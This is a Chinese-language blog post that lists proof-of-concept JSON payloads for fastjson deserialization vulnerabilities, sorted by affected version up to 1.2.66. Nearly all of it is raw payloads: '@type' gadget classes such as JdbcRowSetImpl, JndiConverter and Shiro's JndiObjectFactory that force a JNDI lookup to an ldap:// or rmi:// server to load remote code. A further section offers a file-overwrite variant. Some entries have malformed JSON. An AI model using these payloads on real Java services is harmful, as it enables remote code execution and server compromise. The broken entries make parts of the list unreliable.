fastjson 反序列化漏洞

2024-02-11 07:54:52

一.漏洞POC

fastjson<=1.2.24(CNVD-2017-02833)

{"v24":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

fastjson<=1.2.41

{"v41":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

fastjson<=1.2.42

{"v42":{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

fastjson<=1.2.43

{"v43":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://0.0.0.0","autoCommit":true]}}}

fastjson<=1.2.45

{"v45":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/Exploit"}}}

{
"v45":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"},
"xxx":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://0.0.0.0"}}
}

fastjson<=1.2.47(CNVD-2019-22238)

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "rmi://x.x.x.x:1098/jndi", 
        "autoCommit": true
    }}

{
"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},
"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}
}

fastjson<=1.2.61

{"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"rmi://127.0.0.1"}}

{"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://127.0.0.1","Object":"a"}}

fastjson<=1.2.62

{"aaaa":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}";}

{"v62":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://0.0.0.0"}}

{"v62_error":{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://0.0.0.0"}}}

{"v62_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://0.0.0.0"}}

{"v62_error":{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor","parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://0.0.0.0"},"namespace":""}}

fastjson<=1.2.66

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1389/Calc"}}

写文件覆盖方法
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://0.0.0.0"}{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://0.0.0.0"}
上一篇:fastjson对json数组转java实体类list


下一篇:java.lang.String cannot be cast to com.alibaba.fastjson.JSONArray